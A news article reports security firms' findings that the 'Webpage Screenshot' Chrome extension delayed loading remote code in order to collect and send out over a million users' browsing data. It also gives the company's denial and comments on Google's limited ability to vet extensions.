Malicious Google Chrome extension collected users' data for third parties

"Webpage Screenshot," a Google Chrome extension, was found to be malicious by two security firms earlier this week.
"Webpage Screenshot," a Google Chrome extension, was found to be malicious by two security firms earlier this week.

A Google Chrome extension that advertises itself as a way to take screenshots of webpages is doing more than just that, according to two security firms.

The extension, “Webpage Screenshot,” is also collecting its more than one million users' browsing details in an effort to sell them to third parties, according to separate blog posts published by Heimdal Security and ScrapeSentry. The extension hides its spyware-esque behaviors by waiting to downloading additional code online that enables the data-grabbing.

The original download code contains external URLs that lead to JS script set to be run a week after the extension has been downloaded. It is only after this script is run that the extension begins collecting users' URLs visited, the title of the tabs visited, the country they're in, and the user's unique ID.

This data is then encoded and sent to a web server based in the U.S., the blog posts stated.

The extension avoids possible Google security alarms because the company cannot analyze the entire code and its spyware functions.

The BBC spoke with a spokesman for Webpage Screenshot who said nothing about the extension's data-gathering was malicious. Instead, it was “used to understand who the extension's users were and where they were located to help drive development of the code,” the news agency wrote.

Since the companies published their findings, the extension has been removed and its homepage taken down.

Because the malicious extension can be downloaded for free, its malicious behavior shouldn't be completely unexpected, said Morten Kjaersgaard, CEO of Heimdal Security in emailed comments to SCMagazine.com

“Users need to accept that, in general, nothing is free,” he said. “If you choose to use free extensions, then most likely your data is being used in some connection.”

For its part, Google cannot spot these privacy-invading extensions because to do so, it would need to conduct a full review of the code and how the applications communicate, Kjaersgaard said. In an “open” system, which includes extensions, the task is nearly impossible.

New research from UC Santa Barbara Computer Scientist Alexandros Kapravelos suggests that millions of people have downloaded malicious extensions on Chrome, and his findings pushed Google to remove 192 active ones, BBC reported.

You must be a registered member of SC Magazine to post a comment.

Sign up to our newsletters

TOP COMMENTS